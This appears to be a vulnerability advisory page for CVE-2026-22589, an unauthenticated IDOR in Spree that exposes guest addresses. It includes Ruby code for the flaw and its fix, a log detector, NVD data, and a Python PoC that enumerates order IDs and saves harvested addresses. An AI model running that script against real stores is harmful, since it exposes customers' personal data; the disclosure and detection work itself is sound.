Security Vulnerability Report
CVE-2026-22589 CVSS 7.5 HIGH

Published: 2026-01-10 04:16:01
Last Modified: 2026-01-22 13:45:29

Description

Spree is an open source e-commerce solution built with Ruby on Rails. Prior to versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5, an Unauthenticated Insecure Direct Object Reference (IDOR) vulnerability was identified that allows an unauthenticated attacker to access guest address information without supplying valid credentials or session cookies. This issue has been patched in versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5.
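As an added illustration (not Spree's code, and not derived from the patch commits), the plain Ruby below shows the authorization-bypass pattern behind this class of bug (CWE-639) and the scoping fix: an address record fetched by a client-supplied integer id with nothing tying it to the requesting order, beside a version that resolves the order from an unguessable per-order token first and then looks up the address only within that order. The Order and Address structs, the token scheme and the in-memory store are assumptions for illustration; the enumeration helper shows why sequential ids leak every guest's address when the check is missing, and why a legitimate guest still reaches only their own record after the fix.

```ruby
# Added example (not Spree's code): the IDOR pattern (CWE-639) and its fix in
# plain Ruby with no Rails dependency, so it runs stand-alone.
# Model names, fields and the token scheme are assumptions for illustration.
require "securerandom"

Order   = Struct.new(:id, :token, :email, keyword_init: true)
Address = Struct.new(:id, :order_id, :name, :street, :city, keyword_init: true)

# In-memory stand-in for the database, with sequential integer ids like a
# typical Rails schema. Each guest order carries an unguessable token.
class Store
  attr_reader :orders, :addresses

  def initialize
    @orders = []
    @addresses = []
  end

  def create_guest_order(email:, name:, street:, city:)
    order = Order.new(id: @orders.size + 1, token: SecureRandom.hex(16), email: email)
    @orders << order
    @addresses << Address.new(id: @addresses.size + 1, order_id: order.id,
                              name: name, street: street, city: city)
    order
  end
end

# VULNERABLE: the address is loaded by its id alone. Nothing ties the request
# to a session, a user or an order token, so an unauthenticated caller who
# walks the integer id space receives every guest's address.
def vulnerable_show_address(store, params)
  store.addresses.find { |a| a.id == params[:id] }
end

# FIXED: resolve the order through its unguessable token first, then look up
# the address only inside that order's scope. A missing or wrong token, or an
# address id that belongs to another order, yields nil (a 404 in a real
# controller), which also avoids confirming whether the id exists at all.
def fixed_show_address(store, params)
  token = params[:order_token]
  return nil if token.nil? || token.empty?
  order = store.orders.find { |o| o.token == token }
  return nil unless order
  store.addresses.find { |a| a.order_id == order.id && a.id == params[:id] }
end

# Outside-in enumeration: no token, no cookie, just ids 1..max_id.
def enumerate(store, handler, max_id)
  (1..max_id).filter_map { |id| handler.call(store, { id: id }) }
end

def demo
  store = Store.new
  alice = store.create_guest_order(email: "alice@example.test", name: "Alice",
                                   street: "1 Main St", city: "Springfield")
  store.create_guest_order(email: "bob@example.test", name: "Bob",
                           street: "2 Oak Ave", city: "Shelbyville")

  leaked_before = enumerate(store, method(:vulnerable_show_address), 10)
  leaked_after  = enumerate(store, method(:fixed_show_address), 10)

  # The legitimate guest (holding the order token) still reaches their own
  # address, but cannot point that token at someone else's address id.
  own   = fixed_show_address(store, { order_token: alice.token, id: 1 })
  cross = fixed_show_address(store, { order_token: alice.token, id: 2 })

  { leaked_before: leaked_before.map(&:name), leaked_after: leaked_after.size,
    own: own&.name, cross: cross }
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

Running the file prints the leak before the fix (both guests' names recovered from ids 1..10 with no credentials) and zero records after it, while the token holder still sees exactly one address. The real patch in Spree may scope differently; the point carried over is that every lookup of an object by a client-controlled key must be constrained to what the caller has proven they own.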

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:* (< 4.10.2) - VULNERABLE
cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:* (>= 5.0.0, < 5.0.7) - VULNERABLE
cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:* (>= 5.1.0, < 5.1.9) - VULNERABLE
cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:* (>= 5.2.0, < 5.2.5) - VULNERABLE

Affected: Spree < 4.10.2; 5.0.0 up to but excluding 5.0.7; 5.1.0 up to but excluding 5.1.9; 5.2.0 up to but excluding 5.2.5
Fixed in: 4.10.2, 5.0.7, 5.1.9, 5.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22589 PoC - Spree IDOR Vulnerability
# Description: Unauthenticated IDOR allows access to guest address information
# Affected: Spree < 4.10.2, 5.0.x < 5.0.7, 5.1.x < 5.1.9, 5.2.x < 5.2.5
#
# NOTE: the endpoint paths below are this script's guesses. Neither the NVD
# entry nor the advisory text reproduced on this page names the vulnerable
# route, so confirm the real path against the vendor advisory and patch
# commits before drawing conclusions from a negative result.
import json
import sys

import requests


def exploit_spree_idor(target_url, order_id):
    """
    Exploit the IDOR vulnerability in Spree to retrieve guest address
    information without authentication.

    Args:
        target_url: Base URL of the vulnerable Spree application
        order_id: Order ID (can be guessed or enumerated)

    Returns:
        dict: Address information if successful, None otherwise
    """
    target_url = target_url.rstrip("/")
    # Try multiple endpoint patterns for address retrieval
    endpoints = [
        f"{target_url}/api/orders/{order_id}/addresses",
        f"{target_url}/api/v2/orders/{order_id}/addresses",
        f"{target_url}/api/addresses?order_id={order_id}",
    ]
    for endpoint in endpoints:
        try:
            # Unauthenticated GET: no credentials and no session cookie are sent
            response = requests.get(endpoint, timeout=10)
        except requests.RequestException as e:
            print(f"[-] Request failed for {endpoint}: {e}")
            continue

        if response.status_code == 200:
            try:
                data = response.json()
            except ValueError:
                # A 200 with a non-JSON body (e.g. an HTML storefront page) is not a hit
                print(f"[-] 200 with non-JSON body from: {endpoint}")
                continue
            print(f"[+] Success! Retrieved address from: {endpoint}")
            print(f"[+] Response: {data}")
            return data
        elif response.status_code == 401:
            print(f"[-] Endpoint requires authentication: {endpoint}")
        else:
            print(f"[-] Unexpected status code {response.status_code} from: {endpoint}")
    return None


def enumerate_addresses(target_url, start_id=1, end_id=1000):
    """
    Enumerate and extract all accessible guest addresses by iterating
    through order IDs.

    Args:
        target_url: Base URL of the vulnerable Spree application
        start_id: Starting ID for enumeration
        end_id: Ending ID for enumeration
    """
    print(f"[*] Starting enumeration from ID {start_id} to {end_id}")
    for order_id in range(start_id, end_id + 1):
        result = exploit_spree_idor(target_url, order_id)
        if result:
            print(f"[!] Found address data for Order ID {order_id}")
            # Save to file for later analysis (as real JSON, not a Python repr)
            with open(f"addresses_{order_id}.json", "w") as f:
                json.dump(result, f, indent=2)
    print("[*] Enumeration complete")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2026-22589_poc.py <target_url> <order_id>")
        print("Example: python cve-2026-22589_poc.py https://shop.example.com 12345")
        sys.exit(1)
    target = sys.argv[1]
    order_id = sys.argv[2]
    print(f"[*] Targeting: {target}")
    print(f"[*] Order ID: {order_id}")
    result = exploit_spree_idor(target, order_id)
    if result:
        print("[+] Exploitation successful!")
    else:
        print("[-] Exploitation failed - target may not be vulnerable")
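On the detection side, as an added example that is neither the advisory's nor the PoC's code: the script above walks sequential ids against an address endpoint while sending no session cookie, which is a recognisable shape in web server logs. The Ruby below parses a combined-format access log extended with a trailing cookie field (a constructed format; adapt the regex to whatever your front end emits), pulls the numeric id out of order/address paths including the ?order_id= query form, and flags any source whose anonymous requests hit several distinct, mostly consecutive ids. The sample lines and thresholds are constructed for illustration.

```ruby
# Added example (not from the advisory or the PoC): a log-side heuristic for
# unauthenticated sequential-id enumeration of an address/order endpoint.
# The log format (combined log plus a trailing "cookie=..." field) and the
# thresholds are assumptions; tune both to your own stack and traffic.

LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>\S+) (?<path>\S+) [^"]*" (?<status>\d{3}) \S+ cookie=(?<cookie>\S+)/

# Numeric object id in either the path form (/orders/42/addresses,
# /addresses/42) or the query form (?order_id=42).
ADDRESS_ID = %r{/(?:orders|addresses)/(\d+)\b|[?&]order_id=(\d+)\b}

# Constructed sample: one client probing ids 41..47 with no cookie (two 404s,
# five 200s), one authenticated client fetching its own order twice, one
# unrelated storefront request, and one single anonymous lookup.
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [10/Jan/2026:04:16:01 +0000] "GET /api/v2/orders/41/addresses HTTP/1.1" 404 52 cookie=-
  198.51.100.7 - - [10/Jan/2026:04:16:01 +0000] "GET /api/v2/orders/42/addresses HTTP/1.1" 200 512 cookie=-
  198.51.100.7 - - [10/Jan/2026:04:16:02 +0000] "GET /api/v2/orders/43/addresses HTTP/1.1" 200 498 cookie=-
  198.51.100.7 - - [10/Jan/2026:04:16:02 +0000] "GET /api/v2/orders/44/addresses HTTP/1.1" 404 52 cookie=-
  198.51.100.7 - - [10/Jan/2026:04:16:03 +0000] "GET /api/v2/orders/45/addresses HTTP/1.1" 200 530 cookie=-
  198.51.100.7 - - [10/Jan/2026:04:16:03 +0000] "GET /api/v2/orders/46/addresses HTTP/1.1" 200 517 cookie=-
  198.51.100.7 - - [10/Jan/2026:04:16:04 +0000] "GET /api/addresses?order_id=47 HTTP/1.1" 200 509 cookie=-
  203.0.113.9 - - [10/Jan/2026:04:16:05 +0000] "GET /api/v2/orders/1207/addresses HTTP/1.1" 200 521 cookie=_spree_session=abc
  203.0.113.9 - - [10/Jan/2026:04:16:09 +0000] "GET /api/v2/orders/1207/addresses HTTP/1.1" 200 521 cookie=_spree_session=abc
  203.0.113.10 - - [10/Jan/2026:04:16:10 +0000] "GET /products/ruby-on-rails-tote HTTP/1.1" 200 14022 cookie=-
  192.0.2.5 - - [10/Jan/2026:04:16:11 +0000] "GET /api/v2/orders/500/addresses HTTP/1.1" 200 503 cookie=-
LOG

# Turn raw lines into events for requests that carry an object id; lines that
# do not parse or do not target an id-keyed address route are dropped.
def parse(log)
  log.each_line.filter_map do |line|
    m = LOG_LINE.match(line) or next
    id = ADDRESS_ID.match(m[:path])&.captures&.compact&.first
    next unless id
    { ip: m[:ip], id: id.to_i, status: m[:status].to_i, anonymous: m[:cookie] == "-" }
  end
end

# Flag a source that makes at least min_hits anonymous requests to the address
# route, touching at least min_distinct distinct ids, where at least 80% of
# the sorted neighbouring ids differ by no more than max_gap (a sequential
# walk). Returns one hash per offender; successes counts the 200s, i.e. how
# many records actually left the server.
def detect_enumeration(log, min_hits: 4, min_distinct: 4, max_gap: 2)
  parse(log).select { |e| e[:anonymous] }.group_by { |e| e[:ip] }.filter_map do |ip, events|
    ids = events.map { |e| e[:id] }.uniq.sort
    next if events.size < min_hits || ids.size < min_distinct
    gaps = ids.each_cons(2).map { |a, b| b - a }
    next unless gaps.count { |g| g <= max_gap } >= gaps.size * 0.8
    { ip: ip, distinct_ids: ids.size, successes: events.count { |e| e[:status] == 200 } }
  end
end

if $PROGRAM_NAME == __FILE__
  detect_enumeration(SAMPLE_LOG).each do |hit|
    puts "ALERT idor-enumeration src=#{hit[:ip]} distinct_ids=#{hit[:distinct_ids]} records_returned=#{hit[:successes]}"
  end
end
```

On the sample, only 198.51.100.7 is reported (7 distinct ids, 5 records returned); the cookie-bearing repeat lookup and the lone anonymous request stay below the thresholds. The 404s matter as much as the 200s: an unauthenticated client that receives a mix of both while walking an id range is probing, whatever the final count of successes.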

References

Vendor advisory (tagged Vendor Advisory, Exploit): https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr
Patch commits:
https://github.com/spree/spree/commit/16067def6de8e0742d55313e83b0fbab6d2fd795
https://github.com/spree/spree/commit/4c2bd62326fba0d846fd9e4bad2c62433829b3ad
https://github.com/spree/spree/commit/d051925778f24436b62fa8e4a6b842c72ca80a67
https://github.com/spree/spree/commit/e1cff4605eb15472904602aebaf8f2d04852d6ad
Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22589",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-10T04:16:01.343",
    "lastModified": "2026-01-22T13:45:29.320",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Spree is an open source e-commerce solution built with Ruby on Rails. Prior to versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5, an Unauthenticated Insecure Direct Object Reference (IDOR) vulnerability was identified that allows an unauthenticated attacker to access guest address information without supplying valid credentials or session cookies. This issue has been patched in versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5."},
      {"lang": "es", "value": "Spree es una solución de comercio electrónico de código abierto construida con Ruby on Rails. Antes de las versiones 4.10.2, 5.0.7, 5.1.9 y 5.2.5, se identificó una vulnerabilidad de Referencia Directa a Objeto Insegura No Autenticada (IDOR) que permite a un atacante no autenticado acceder a información de dirección de invitado sin proporcionar credenciales válidas o cookies de sesión. Este problema ha sido parcheado en las versiones 4.10.2, 5.0.7, 5.1.9 y 5.2.5."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.10.2", "matchCriteriaId": "B265915C-3AA8-4B6C-9794-DA08F6359D31"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.7", "matchCriteriaId": "C6C152A8-FCA5-4420-A138-E09B27970EE4"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.1.0", "versionEndExcluding": "5.1.9", "matchCriteriaId": "54EEC933-938E-404B-A87B-3771931D5E23"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:spreecommerce:spree:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2.0", "versionEndExcluding": "5.2.5", "matchCriteriaId": "1C6D055D-A9A8-46E1-A16C-FE17B66E800B"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/spree/spree/commit/16067def6de8e0742d55313e83b0fbab6d2fd795", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/spree/spree/commit/4c2bd62326fba0d846fd9e4bad2c62433829b3ad", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/spree/spree/commit/d051925778f24436b62fa8e4a6b842c72ca80a67", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/spree/spree/commit/e1cff4605eb15472904602aebaf8f2d04852d6ad", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]},
      {"url": "https://github.com/spree/spree/security/advisories/GHSA-3ghg-3787-w2xr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory", "Exploit"]}
    ]
  }
}